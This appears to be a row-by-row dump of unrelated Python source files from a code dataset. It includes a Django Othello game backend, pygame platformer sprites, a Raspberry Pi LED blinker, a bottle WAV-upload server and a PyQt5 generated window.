                reason = "%s '%s' already exists" % (err.field_name, err.field_value)
                raise util.ActionError('create', err.resource, reason)
            if err.constraint == util.DatabaseConstraintViolationError.NOT_NULL:
                reason = 'Null value for non-nullable field'
                raise util.ActionError('create', err.resource, reason)
            raise err
        except util.DatabaseInvalidValueError as err:
            reason = 'Value invalid or too long for field'
            if err.field_name:
                reason = "%s '%s'" % (reason, err.field_name)
            raise util.ActionError('create', err.resource, reason)
        finally:
            db_conn.close()
class ReadAction(Action):
    """Read action -- placeholder implementation."""

    def execute(self, params):
        """Return a stub payload; real querying is not implemented yet."""
        message = "Sorry, I'm very tired. Gonna sleep."
        return {'message': message}
|
24,669 | 1debb227240c7f8bee3127033e8dc4a5d7ff9597 | /home/harshita/anaconda3/lib/python3.5/posixpath.py |
24,670 | b7b1c48afd6968bf4a7685331cf9ba515f5a7686 | # Generated by Django 2.2.11 on 2020-05-25 16:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """Creates the `Logins` model (table 'user logins') recording which
    month/year a user (by unique email) logged in."""

    dependencies = [
        ('accounts', '0005_auto_20200523_2248'),
    ]

    operations = [
        migrations.CreateModel(
            name='Logins',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_email', models.EmailField(max_length=60, unique=True, verbose_name='user email')),
                ('login_month', models.IntegerField()),
                ('login_year', models.IntegerField()),
            ],
            options={
                'verbose_name_plural': 'User logins',
                'db_table': 'user logins',
            },
        ),
    ]
|
24,671 | 13816be5ee9a1074112ef6013856b4eda7f041a4 | #!/usr/bin/env python3
from fastapi import Path, Body
from pydantic import BaseModel, Schema
from typing import List
class Job(BaseModel):
    """ Defines the type parameter of POST /jobs request.
    """
    # NOTE(review): pydantic v1 renamed `Schema` to `Field`; `Schema` is a
    # deprecated alias -- consider migrating.  Also, `bitrate` only enforces
    # gt=0 even though the description promises [500, 8000] -- confirm intent.
    id_video: str = Schema (None,
            title = "Resource Path of the Video",
            max_length = 256)
    """ resource Path of the Video
    """
    bitrate: int = Schema (None,
            title = "Bitrate of the Requested Video",
            gt = 0,
            description = "The bitrate must be in [500, 8000]")
    """ bitrate of the Requested Video. Must be in range [500, 8000]
    """
    speed: str = Schema (None,
            title = "Encoding Speed",
            description = "It can be ultrafast or fast")
    """ encoding speed. Can be "ultrafast" or "fast"
    """
class State:
    """ Possible states for a Job.
    """
    # String constants (not an Enum) -- callers compare these values directly.
    WAITING = "Waiting"
    STARTED = "Started"
    COMPLETED = "Completed"
    ERROR = "Error"
|
24,672 | 31c92656f935433e4bdcf9b470f43e4f07b4348c | import pygame as pg
from random import choice, randrange
from settings import *
from game import *
class Player(GameSprite):
    """The controllable character: input handling, jump physics and animation."""

    def __init__(self, game):
        GameSprite.__init__(self, game, [game.all_sprites], layer=PLAYER_LAYER)
        # animation state
        self.walking = False
        self.jumping = False
        self.current_frame = 0
        self.last_update = 0  # timestamp (ms) of the last animation frame swap
        self.load_images()
        self.image = self.standing_frames[0]
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.center = (40, HEIGHT - 100)
        # physics: position, constant downward acceleration, horizontal friction
        self.pos = vec(40, HEIGHT - 100)
        self.acc = vec(0, PLAYER_GRAV)
        self.friction = vec(PLAYER_FRICTION, 0)
        self.static = False
        # NOTE(review): self.vel is read in jump_cut()/jump()/animate() but is
        # never initialised here -- presumably set by GameSprite; confirm.

    def load_images(self):
        """Slice all animation frames out of the shared sprite sheet."""
        self.standing_frames = [self.game.spritesheet.get_image(614, 1063, 120, 191),
                                self.game.spritesheet.get_image(690, 406, 120, 201)]
        for frame in self.standing_frames:
            frame.set_colorkey(BLACK)
        self.walk_frames_r = [self.game.spritesheet.get_image(678, 860, 120, 201),
                              self.game.spritesheet.get_image(692, 1458, 120, 207)]
        for frame in self.walk_frames_r:
            frame.set_colorkey(BLACK)
        # left-facing frames are mirrored copies of the right-facing ones
        self.walk_frames_l = []
        for frame in self.walk_frames_r:
            self.walk_frames_l.append(pg.transform.flip(frame, True, False))
        for frame in self.walk_frames_l:
            frame.set_colorkey(BLACK)
        self.jump_frame = self.game.spritesheet.get_image(382, 763, 150, 181)
        self.jump_frame.set_colorkey(BLACK)

    def jump_cut(self):
        """Cap upward velocity (short hop) -- called when the jump key is released."""
        if self.jumping:
            if self.vel.y < -3:
                self.vel.y = -3

    def jump(self):
        """Jump, but only when standing on a platform (probed by a 2 px dip)."""
        self.rect.y += 2
        hits = pg.sprite.spritecollide(self, self.game.platforms, False)
        self.rect.y -= 2
        if hits and not self.jumping:
            print("play sound")
            self.game.jump_sound.play()
            self.jumping = True
            self.vel.y = -PLAYER_JUMP_VEL

    def nothing_below(self):
        """Return True when no platform is directly under the player's feet."""
        self.rect.y += 2
        hits = pg.sprite.spritecollide(self, self.game.platforms, False)
        self.rect.y -= 2
        return len(hits) == 0

    def update_sprite(self):
        """Per-frame step: animate, then rebuild acceleration from key state."""
        self.animate()
        self.acc = vec(0, PLAYER_GRAV)
        keys = pg.key.get_pressed()
        if keys[pg.K_LEFT]:
            self.acc.x = -PLAYER_ACC
        if keys[pg.K_RIGHT]:
            self.acc.x = PLAYER_ACC

    def update_position(self):
        """Snap the sprite rect to the physics position (feet at self.pos)."""
        self.rect.midbottom = self.pos

    def animate(self):
        """Advance walk/idle animation frames based on elapsed time."""
        now = pg.time.get_ticks()
        if self.vel.x != 0:
            self.walking = True
        else:
            self.walking = False
        if self.walking:
            if now - self.last_update > 200:  # walk frames swap every 200 ms
                self.last_update = now
                self.current_frame = (self.current_frame + 1) % len(self.walk_frames_l)
                bottom = self.rect.bottom  # keep the feet anchored across frame swaps
                if self.vel.x > 0:
                    self.image = self.walk_frames_r[self.current_frame]
                else:
                    self.image = self.walk_frames_l[self.current_frame]
                self.rect = self.image.get_rect()
                self.rect.bottom = bottom
        if not self.jumping and not self.walking:
            if now - self.last_update > 350:  # idle frames swap every 350 ms
                self.last_update = now
                self.current_frame = (self.current_frame + 1) % len(self.standing_frames)
                bottom = self.rect.bottom
                self.image = self.standing_frames[self.current_frame]
                self.rect = self.image.get_rect()
                self.rect.bottom = bottom
        # refresh the collision mask to match the current frame
        self.mask = pg.mask.from_surface(self.image)
class Platform(GameSprite):
    """A static platform the player can land on; may spawn a power-up on top."""

    def __init__(self, game, x, y):
        GameSprite.__init__(self, game, [game.all_sprites, game.platforms], PLATFORM_LAYER)
        # two platform sprites of different widths; one is picked at random
        self.images = [self.game.spritesheet.get_image(0, 288, 380, 94),
                       self.game.spritesheet.get_image(213, 1662, 201, 100)]
        self.image = choice(self.images)
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = y
        # POW_SPAWN_PCT percent chance to place a power-up on the new platform
        if randrange(100) < POW_SPAWN_PCT:
            Pow(self.game, self)
class Pow(GameSprite):
    """A power-up that rides on top of a platform and dies with it."""

    def __init__(self, game, plat):
        GameSprite.__init__(self, game, [game.all_sprites, game.powerups], POW_LAYER)
        self.plat = plat  # the platform this power-up is attached to
        self.type = choice(['boost'])  # only one type exists so far
        self.image = self.game.spritesheet.get_image(820,1805,71,70)
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.centerx = self.plat.rect.centerx
        self.rect.bottom = self.plat.rect.top - 5

    def update(self):
        # follow the platform; disappear once the platform has been killed
        self.rect.bottom = self.plat.rect.top - 5
        if not self.game.platforms.has(self.plat):
            self.kill()
class Mob(GameSprite):
    """A flying enemy that crosses the screen horizontally while bobbing."""

    def __init__(self, game):
        GameSprite.__init__(self, game, [game.all_sprites, game.mobs], MOB_LAYER)
        self.image_up = self.game.spritesheet.get_image(566, 510, 122, 139)
        self.image_up.set_colorkey(BLACK)
        self.image_down = self.game.spritesheet.get_image(568, 1534, 122, 135)
        self.image_down.set_colorkey(BLACK)
        self.image = self.image_up
        self.rect = self.image.get_rect()
        # spawn just off either side of the screen, moving inwards
        self.rect.centerx = choice([-100, WIDTH + 100])
        self.vx = randrange(1, 4)
        if self.rect.centerx > WIDTH:
            self.vx *= -1
        # BUG FIX: randrange(HEIGHT / 2) passed a float; non-integer arguments
        # are deprecated since Python 3.10 and raise TypeError in 3.12+.
        self.rect.y = randrange(HEIGHT // 2)
        self.vy = 0
        self.dy = 0.5  # vertical acceleration; its sign flips to create bobbing

    def update(self):
        """Move horizontally, oscillate vertically, and die once off-screen."""
        self.rect.x += self.vx
        self.vy += self.dy
        if self.vy > 3 or self.vy < -3:
            self.dy *= -1  # reverse bob direction at the speed limit
        center = self.rect.center
        # wing frame follows the bob direction
        if self.dy < 0:
            self.image = self.image_up
        else:
            self.image = self.image_down
        self.rect = self.image.get_rect()
        self.rect.center = center
        self.rect.y += self.vy
        self.mask = pg.mask.from_surface(self.image)
        if self.rect.left > WIDTH + 100 or self.rect.right < -100:
            self.kill()
class Cloud(GameSprite):
    """Background cloud that drifts horizontally and wraps around the screen."""

    def __init__(self, game):
        GameSprite.__init__(self, game, [game.all_sprites, game.clouds], CLOUD_LAYER)
        self.image = choice(self.game.cloud_images)
        self.image.set_colorkey(BLACK)
        # BUG FIX: pg.transform.scale returns a NEW surface; the original call
        # discarded the result, so the cloud was never actually resized.
        scale = randrange(50, 101) / 100
        base_rect = self.image.get_rect()
        self.image = pg.transform.scale(
            self.image,
            (int(base_rect.width * scale), int(base_rect.height * scale)))
        self.rect = self.image.get_rect()  # recompute from the scaled surface
        self.rect.x = randrange(WIDTH - self.rect.width)
        self.rect.y = randrange(-500, -50)
        self.vx = choice([-2, -1, 1, 2])  # horizontal drift speed, never 0

    def update(self):
        """Drift sideways, wrap at the edges, die when scrolled far below."""
        self.rect.x += self.vx
        # wrap around the sides of the screen
        if self.rect.left >= WIDTH:
            self.rect.right = 0
        elif self.rect.right <= 0:
            self.rect.left = WIDTH
        if self.rect.top > HEIGHT * 2:
            self.kill()
|
24,673 | 79530d34cd246758e9c74e8a3b804c1363182954 | def nfsmsim(string, current, edges, accepting):
if string =="":
return current in accepting
else:
letter = string[0:1]
if (current, letter) in edges:
remainder = string[1:]
newstates = edges[(current, letter)]
for newstate in newstates:
if nfsmsim(remainder, newstate, edges, accepting):
return True
return False |
24,674 | 8b2059b12fc0a6dc86060df6c3c02f08451270fc | import board
import busio
import time
import RPi.GPIO as GPIO
from digitalio import Direction, Pull
from adafruit_mcp230xx.mcp23017 import MCP23017
i2c = busio.I2C(board.SCL, board.SDA)
mcp = MCP23017(i2c)
pinR = mcp.get_pin(7)
pinG = mcp.get_pin(6)
pinB = mcp.get_pin(5)
pinL = [pinR, pinG, pinB]
for pin in pinL:
pin.direction = Direction.OUTPUT
pin.switch_to_output(value=True)
pin.value=False
def blink_cycle():
    """Blink the R, G and B channels together at a 0.5 s half-period.

    Runs until interrupted (e.g. Ctrl-C); the finally-block switches every
    channel off so the LED is never left lit.
    """
    def state_generator(period):
        # All three channels toggle in lockstep, exactly as the original
        # three separate s1/s2/s3 flags did (they always held equal values).
        state = 0
        while True:
            state ^= 1
            time.sleep(period)
            yield [state, state, state]

    try:
        # BUG FIX: the original compared ints with `is` (e.g. `s1 is 0`,
        # `state[0] is 1`), which relies on CPython small-int caching and
        # emits a SyntaxWarning on Python 3.8+; value equality is intended.
        for state in state_generator(.5):
            pinR.value = (state[0] == 1)
            pinB.value = (state[1] == 1)
            pinG.value = (state[2] == 1)
    finally:
        pinR.value = False
        pinB.value = False
        pinG.value = False


if __name__ == "__main__":
    blink_cycle()
24,675 | 87579223a7c9fd4602bc4f6c3bf3d316149056e0 | import plotly.colors
def get_continuous_color(colorscale, intermed):
    """
    Author Frederic Abraham took it from stack overflow for the visualization
    Src = https://stackoverflow.com/questions/62710057/access-color-from-plotly-color-scale
    Plotly continuous colorscales assign colors to the range [0, 1]. This function computes the intermediate
    color for any value in that range.
    Plotly doesn't make the colorscales directly accessible in a common format.
    Some are ready to use:
        colorscale = plotly.colors.PLOTLY_SCALES["Greens"]
    Others are just swatches that need to be constructed into a colorscale:
        viridis_colors, scale = plotly.colors.convert_colors_to_same_type(plotly.colors.sequential.Viridis)
        colorscale = plotly.colors.make_colorscale(viridis_colors, scale=scale)
    :param colorscale: A plotly continuous colorscale defined with RGB string colors.
    :param intermed: value in the range [0, 1]
    :return: color in rgb string format
    :rtype: str
    """
    if len(colorscale) < 1:
        raise ValueError("colorscale must have at least one color")
    # Clamp: at/below the bottom of the scale (or a single-entry scale)
    # return the first color; at/above the top return the last color.
    if intermed <= 0 or len(colorscale) == 1:
        return colorscale[0][1]
    if intermed >= 1:
        return colorscale[-1][1]
    # Walk the (cutoff, color) pairs: remember the last cutoff below
    # `intermed`, stop at the first cutoff at/above it.
    for cutoff, color in colorscale:
        if intermed > cutoff:
            low_cutoff, low_color = cutoff, color
        else:
            high_cutoff, high_color = cutoff, color
            break
    # noinspection PyUnboundLocalVariable
    # Linear interpolation between the two bracketing colors.
    return plotly.colors.find_intermediate_color(
        lowcolor=low_color, highcolor=high_color,
        intermed=((intermed - low_cutoff) / (high_cutoff - low_cutoff)),
        colortype="rgb")
24,676 | 09255fb803a9820578df23a1092b2d3bef92b443 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import _thread
import time
from django.shortcuts import render
from django.utils.crypto import get_random_string
from django.http import JsonResponse
tokenList = []
a = [1, -1, 0, 0]
b = [0, 0, 1, -1]
status = {}
game = {}
scores = {}
playing = {}
timer = {}
cnt = 0
dr = [
0,
-1,
-1,
-1,
0,
1,
1,
1,
]
dc = [
-1,
-1,
0,
1,
1,
1,
0,
-1,
]
def Timer(token):
    """Background-thread body: decrement the game's countdown once per second.

    NOTE(review): this loop never terminates -- the thread keeps ticking even
    after the game identified by *token* has ended; confirm this is intended.
    """
    while(True):
        timer[token]-=1
        time.sleep(1)
def home(request):
    """Render the token-entry landing page."""
    return render(request, 'userInput.html')
def getToken(request):
    """Return the list of currently active game tokens as JSON."""
    return JsonResponse({'list':tokenList})
def passChance(request):
    """Skip the requesting player's move and hand the turn to the opponent.

    Status 5 hands the turn to player 2, status 4 to player 1 (the same
    codes `request()` uses to pick whose timer to report).
    """
    token = request.GET['token']
    player = request.GET['player']
    status[token] = 5 if player == '1' else 4
    return JsonResponse({'token': token})
def scoreUpdate(token):
    """Recount the 64-cell board for *token*.

    Side effects: scores[token] receives the number of '0' cells (player 1
    discs) and the module-global ``cnt`` the number of '1' cells (player 2
    discs).  Only the first 8x8 = 64 positions of the board string are
    examined, exactly as the original nested i/j loop did.
    """
    global cnt
    board = game[token]
    scores[token] = sum(1 for pos in range(64) if board[pos] == '0')
    cnt = sum(1 for pos in range(64) if board[pos] == '1')
def request(request):
    """Polling endpoint: refresh and report a game's board, scores and timers.

    Status codes (as used throughout this module): 4/5 = player 1 / player 2
    to move, 6/7 = game finished (win / loss from the poller's perspective)
    -- NOTE(review): confirm against the client-side code.
    """
    token = request.GET['token']
    chance = request.GET['player']
    print(tokenList)
    scoreUpdate(token)  # refreshes scores[token] and the module-global cnt
    global cnt
    if status[token] == 6 or status[token] == 7:
        # Game finished: this player leaves the game.
        playing[token] -= 1
        # BUG FIX: the original removed the token unconditionally on every
        # poll (ValueError on the second poll) and then, when both players
        # had left, called tokenList.remove(x) with an undefined name `x`
        # (NameError).  Remove the token once, only while it is still listed.
        if token in tokenList:
            tokenList.remove(token)
    if (scores[token] + cnt) == 64:
        # Board is full -- decide the winner relative to the polling player.
        if chance == '1':
            if scores[token] > cnt:
                status[token] = 6
            else:
                status[token] = 7
        else:
            if scores[token] > cnt:
                status[token] = 7
            else:
                status[token] = 6
    if status[token] == 2:
        # The second player has joined; start player 1's turn.
        status[token] = 4
        timer[token] = 60
    if scores[token] == 0 or timer[token] <= 0 or cnt == 0 or status[token] >= 6:
        # A side has no discs left, or the move timer expired: mover loses.
        if status[token] == 4:
            status[token] = 7
        elif status[token] == 5:
            status[token] = 6
    if status[token] == 4:
        return JsonResponse({'token': token, 'table': game[token], 'player': chance, 'score1': scores[token], 'score2': cnt, 'status': status[token], 'timer1': timer[token], 'timer2': '60'})
    elif status[token] == 5:
        return JsonResponse({'token': token, 'table': game[token], 'player': chance, 'score1': scores[token], 'score2': cnt, 'status': status[token], 'timer1': '60', 'timer2': timer[token]})
    else:
        return JsonResponse({'token': token, 'table': game[token], 'player': chance, 'score1': scores[token], 'score2': cnt, 'status': status[token], 'timer1': '60', 'timer2': '60'})
def newGame(request):
    """Create a fresh game: token, initial 8x8 board, and bookkeeping state.

    Board encoding (64-char string): '0' = player 1 disc, '1' = player 2
    disc, '2' = empty.  The standard opening has discs at (3,3)/(4,4) and
    (3,4)/(4,3).
    """
    token = get_random_string(length=5)
    tokenList.append(token)
    board = ""
    for i in range(0, 8):
        for j in range(0, 8):
            # equivalent to the original `(i==j) and (i==3 or j==4)`:
            # with i == j that reduces to i in (3, 4)
            if i == j and i in (3, 4):
                board += '0'
            elif (i == 3 and j == 4) or (i == 4 and j == 3):
                board += '1'
            else:
                board += '2'
    game[token] = board
    # (removed unused locals `id` and `player` from the original)
    playing[token] = 1   # only player 1 so far; verify() bumps this to 2
    status[token] = 1    # waiting for the second player to join
    timer[token] = 60
    return render(request, 'newGame.html', {'token': token, 'table': board, 'player': "1"})
def verify(request, token):
    """Join an existing game as player 2 when the token is valid and open."""
    if str(token) in tokenList:
        if playing[token] == 2:
            # Game already has two players; send the visitor back.
            return render(request, 'userInput.html')
        status[token] = 2
        playing[token] = 2
        timer[token] = 60
        # Start the countdown thread for this game (see Timer: never stops).
        _thread.start_new_thread(Timer,(token,))
        return render(request, 'newGame.html', {'token': token,'table':game[token],'player':"2"})
    else:
        return render(request, 'userInput.html')
def update(request):
    """Apply the move (row, col) for *player*, flipping captured discs.

    Board encoding: '0' = player 1 disc, '1' = player 2 disc, '2' = empty.
    Returns the new board plus scores/timers/status as JSON.
    """
    # BUG FIX: the original declared `global cnt` AFTER assigning a local
    # `cnt` earlier in the same function body, which is a SyntaxError
    # ("name 'cnt' is assigned to before global declaration").  The per-
    # direction counter is now a separate local (`run`); `cnt` is only the
    # module-global opponent-disc count maintained by scoreUpdate().
    # (Also removed the original's unused `global chance`.)
    global cnt
    row = int(request.GET['row'])
    col = int(request.GET['col'])
    token = request.GET['token']
    player = request.GET['player']
    table = list(game[token])
    flip = int(player) - 1
    # store as str to match the board encoding (the original stored an int
    # here; harmless only because the direction scans never revisit the
    # origin cell before the final join)
    table[row * 8 + col] = str(flip)
    timer[token] = 60
    for i in range(0, 8):
        x = dr[i]
        y = dc[i]
        l = row + x
        r = col + y
        run = 0  # opponent discs seen along this direction
        while l >= 0 and l < 8 and r >= 0 and r < 8:
            if table[l * 8 + r] == '2':
                break
            if table[l * 8 + r] == str(flip):
                break
            run += 1
            l += x
            r += y
        # Flip the run only if it ends on one of the mover's own discs.
        if run >= 1 and l >= 0 and l < 8 and r >= 0 and r < 8 and table[l * 8 + r] == str(flip):
            l = row + x
            r = col + y
            while l >= 0 and l < 8 and r >= 0 and r < 8:
                if table[l * 8 + r] == '2':
                    break
                if table[l * 8 + r] == str(flip):
                    break
                table[l * 8 + r] = str(flip)
                l += x
                r += y
    game[token] = "".join([str(i) for i in table])
    status[token] ^= 1  # hand the turn to the other player (4 <-> 5)
    scoreUpdate(token)  # refreshes scores[token] and the global cnt
    if scores[token] == 0 or timer[token] == 0:
        status[token] += 2
    if cnt == 0:
        status[token] += 2
    if player == '1':
        return JsonResponse({'table': "".join([str(i) for i in table]), 'player': player, 'timer1': timer[token], 'timer2': '60', 'score1': scores[token], 'score2': cnt, 'status': status[token]})
    else:
        return JsonResponse({'table': "".join([str(i) for i in table]), 'player': player, 'timer1': '60', 'timer2': timer[token], 'score1': cnt, 'score2': scores[token], 'status': status[token]})
|
24,677 | da82e51f723481f37110ba331c00e39448fdc849 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'UiMessageBrowserWindow.ui'
#
# Created by: PyQt5 UI code generator 5.8.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MessageBrowserWindow(object):
def setupUi(self, MessageBrowserWindow):
MessageBrowserWindow.setObjectName("MessageBrowserWindow")
MessageBrowserWindow.resize(320, 480)
MessageBrowserWindow.setMinimumSize(QtCore.QSize(320, 0))
self.centralwidget = QtWidgets.QWidget(MessageBrowserWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setContentsMargins(1, 1, 1, 1)
self.gridLayout.setObjectName("gridLayout")
self.filter_config_file_line_edit = QtWidgets.QLineEdit(self.centralwidget)
self.filter_config_file_line_edit.setReadOnly(True)
self.filter_config_file_line_edit.setObjectName("filter_config_file_line_edit")
self.gridLayout.addWidget(self.filter_config_file_line_edit, 0, 1, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.message_browser_plain_text_edit = QtWidgets.QPlainTextEdit(self.centralwidget)
self.message_browser_plain_text_edit.setMinimumSize(QtCore.QSize(300, 0))
font = QtGui.QFont()
font.setFamily("Consolas")
self.message_browser_plain_text_edit.setFont(font)
self.message_browser_plain_text_edit.setLineWrapMode(QtWidgets.QPlainTextEdit.NoWrap)
self.message_browser_plain_text_edit.setReadOnly(True)
self.message_browser_plain_text_edit.setObjectName("message_browser_plain_text_edit")
self.gridLayout.addWidget(self.message_browser_plain_text_edit, 1, 0, 1, 2)
MessageBrowserWindow.setCentralWidget(self.centralwidget)
self.toolBar = QtWidgets.QToolBar(MessageBrowserWindow)
self.toolBar.setMovable(False)
self.toolBar.setObjectName("toolBar")
MessageBrowserWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.actionOpenFilterConfigFile = QtWidgets.QAction(MessageBrowserWindow)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/ico/ico/LogFilter.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionOpenFilterConfigFile.setIcon(icon)
self.actionOpenFilterConfigFile.setObjectName("actionOpenFilterConfigFile")
self.actionSaveFilterConfigFile = QtWidgets.QAction(MessageBrowserWindow)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/ico/ico/Save.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSaveFilterConfigFile.setIcon(icon1)
self.actionSaveFilterConfigFile.setObjectName("actionSaveFilterConfigFile")
self.actionSaveAsFilterConfigFile = QtWidgets.QAction(MessageBrowserWindow)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/ico/ico/SaveAs.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSaveAsFilterConfigFile.setIcon(icon2)
self.actionSaveAsFilterConfigFile.setObjectName("actionSaveAsFilterConfigFile")
self.actionStartToWatch = QtWidgets.QAction(MessageBrowserWindow)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/ico/ico/Start.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionStartToWatch.setIcon(icon3)
self.actionStartToWatch.setObjectName("actionStartToWatch")
self.actionStopToWatch = QtWidgets.QAction(MessageBrowserWindow)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/ico/ico/Stop.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionStopToWatch.setIcon(icon4)
self.actionStopToWatch.setObjectName("actionStopToWatch")
self.actionClearAllMessages = QtWidgets.QAction(MessageBrowserWindow)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/ico/ico/LogClear.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionClearAllMessages.setIcon(icon5)
self.actionClearAllMessages.setObjectName("actionClearAllMessages")
self.toolBar.addAction(self.actionOpenFilterConfigFile)
self.toolBar.addAction(self.actionSaveFilterConfigFile)
self.toolBar.addAction(self.actionSaveAsFilterConfigFile)
self.toolBar.addSeparator()
self.toolBar.addAction(self.actionStartToWatch)
self.toolBar.addAction(self.actionStopToWatch)
self.toolBar.addSeparator()
self.toolBar.addAction(self.actionClearAllMessages)
self.retranslateUi(MessageBrowserWindow)
QtCore.QMetaObject.connectSlotsByName(MessageBrowserWindow)
def retranslateUi(self, MessageBrowserWindow):
_translate = QtCore.QCoreApplication.translate
MessageBrowserWindow.setWindowTitle(_translate("MessageBrowserWindow", "MainWindow"))
self.label.setText(_translate("MessageBrowserWindow", "Config:"))
self.toolBar.setWindowTitle(_translate("MessageBrowserWindow", "toolBar"))
self.actionOpenFilterConfigFile.setText(_translate("MessageBrowserWindow", "Open Filter Config File"))
self.actionSaveFilterConfigFile.setText(_translate("MessageBrowserWindow", "Save Filter Config File"))
self.actionSaveAsFilterConfigFile.setText(_translate("MessageBrowserWindow", "Save As Filter Config File"))
self.actionStartToWatch.setText(_translate("MessageBrowserWindow", "Start To Watch"))
self.actionStopToWatch.setText(_translate("MessageBrowserWindow", "Stop To Watch"))
self.actionClearAllMessages.setText(_translate("MessageBrowserWindow", "Clear All"))
import UiResource_rc
|
24,678 | d2306e246384bde51db362953c74e46e6b71b882 |
class Enemy(object):
    """Base class for all enemies: a name, hit points, and attack damage."""

    def __init__(self, name, hp, damage):
        # BUG FIX: the original read `def__init__(...)` (missing space after
        # `def`), a SyntaxError that made the whole module unimportable.
        self.name = name
        self.hp = hp
        self.damage = damage

    def is_alive(self):
        """Return True while the enemy still has hit points left."""
        return self.hp > 0
class GiantSpider(Enemy):
    """A weak enemy: 10 HP, 2 damage."""

    def __init__(self):
        super().__init__(name="Giant Spider",hp =10, damage =2)
class Ogre(Enemy):
    """A tough enemy: 30 HP, 15 damage."""

    def __init__(self):
        super().__init__(name="Ogre",hp=30,damage=15)
|
24,679 | 24d216d5cc472408677932220cdd921a0110d44c | # -*- coding: utf-8 -*-
import os, wave, time
from bottle import route, run, request, static_file, view
upload_dir = 'upload_dir/'
@route('/', method='GET')
@view('files')
def file_list():
    """List the uploaded .wav files for the 'files' template, newest first."""
    files_info = []
    if os.path.exists(upload_dir):
        files = os.listdir(upload_dir)
        # filenames are unix-timestamp based, so reverse sort = newest first
        files.sort(reverse=True)
        files_info = [{
            "url": 'files/' + filename,
            "name": filename,
            "time": int(os.path.getmtime(os.path.join(upload_dir, filename)))
        } for filename in files if os.path.splitext(filename)[1] == '.wav']
    return dict(files=files_info)
@route('/wave', method='POST')
def do_upload():
    """Accept a raw 16-bit PCM upload (.r16) and store it as a timestamped WAV."""
    wav_file = request.files.get('file')
    name, ext = os.path.splitext(wav_file.filename)
    # Listnr uploads audio data as “sample.r16”
    # BUG FIX: `ext not in ('.r16')` tested membership in the STRING '.r16'
    # (parentheses alone don't make a tuple), so e.g. ext == '.r1' or an
    # empty extension was wrongly accepted.  Compare against a real tuple.
    if ext not in ('.r16',):
        return 'File extension not allowed.'
    if not os.path.exists(upload_dir):
        os.mkdir(upload_dir)
    file_name = str(int(time.time())) + '.wav'
    file_path = os.path.join(upload_dir, file_name)
    write_wave(file_path, wav_file.file.read())
    return 'OK'
@route('/files/<filename:re:.+\.wav>')
def wav_files(filename):
return static_file(filename, root=upload_dir)
@route('/img/<filename:re:.+\.png>')
def img_files(filename):
return static_file(filename, root='img/')
@route('/css/<filename:re:.+\.css>')
def css_files(filename):
return static_file(filename, root='css/')
@route('/js/<filename:re:.+\.js>')
def js_files(filename):
return static_file(filename, root='js/')
def write_wave(file_path, wave_bin):
    """Write raw 16-bit mono 16 kHz PCM bytes to *file_path* as a WAV file.

    Args:
        file_path: destination path for the .wav file.
        wave_bin: raw little-endian PCM sample bytes (no header).
    """
    # Use the context manager so the file handle is closed even when
    # writeframes fails (the original leaked the handle on exception).
    with wave.open(file_path, 'wb') as wave_file:
        # Mono, 16bit, 16kHz
        wave_file.setparams((1, 2, 16000, 0, 'NONE', 'not compressed'))
        wave_file.writeframes(wave_bin)
run(host='0.0.0.0', port=8080, debug=True, reloader=True)
|
24,680 | 58fca15da7aaf881f9a9a2fe7ce24c3ce5694d11 | #
# Solution to Project Euler problem 7
#
# Author: Xiaochen Li
# Date: May 21, 2019
#
#
# Problem: What is the 10 001st prime number?
#
#
|
24,681 | cc858eb21d62737b9cfd12c1e08a5b134ccc1d6d | # 문제 : 자동차 객체를 담을 변수를 만들어주세요.
# 자동차 객체를 변수에 담고 그 변수를 이용해 최고속력이 서로 다르게 만들어주세요.
# 각 자동차가 자신의 최고속력으로 달리게 해주세요.
# 출력 : 자동차가 최대속력 220km로 달립니다.
# 출력 : 자동차가 최대속력 250km로 달립니다.
class Car :
    """A car with a class-level top speed (km/h); instances override maxVelo."""
    # default top speed; the script below assigns per-instance values
    maxVelo = 0

    def drive(self) :
        # user-facing Korean message: "The car drives at a top speed of {}km."
        print("자동차가 최대속력 {}km로 달립니다.".format(self.maxVelo))
c1 = Car()
c2 = Car()
c1.maxVelo = 220
c2.maxVelo = 250
c1.drive()
c2.drive()
|
24,682 | c200d31129681b8a95ceb8215a8603a75b9e34f4 |
# planetary constants
from . import earth
from .constants import * |
24,683 | 6e157fd3a5ec5c9e4817660cefbc4b202af61cad | """
Copyright (C) 2015 Patrick Moore
patrick.moore.bu@gmail.com
Created by Patrick Moore
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
bl_info = {
"name": "Cut Mesh",
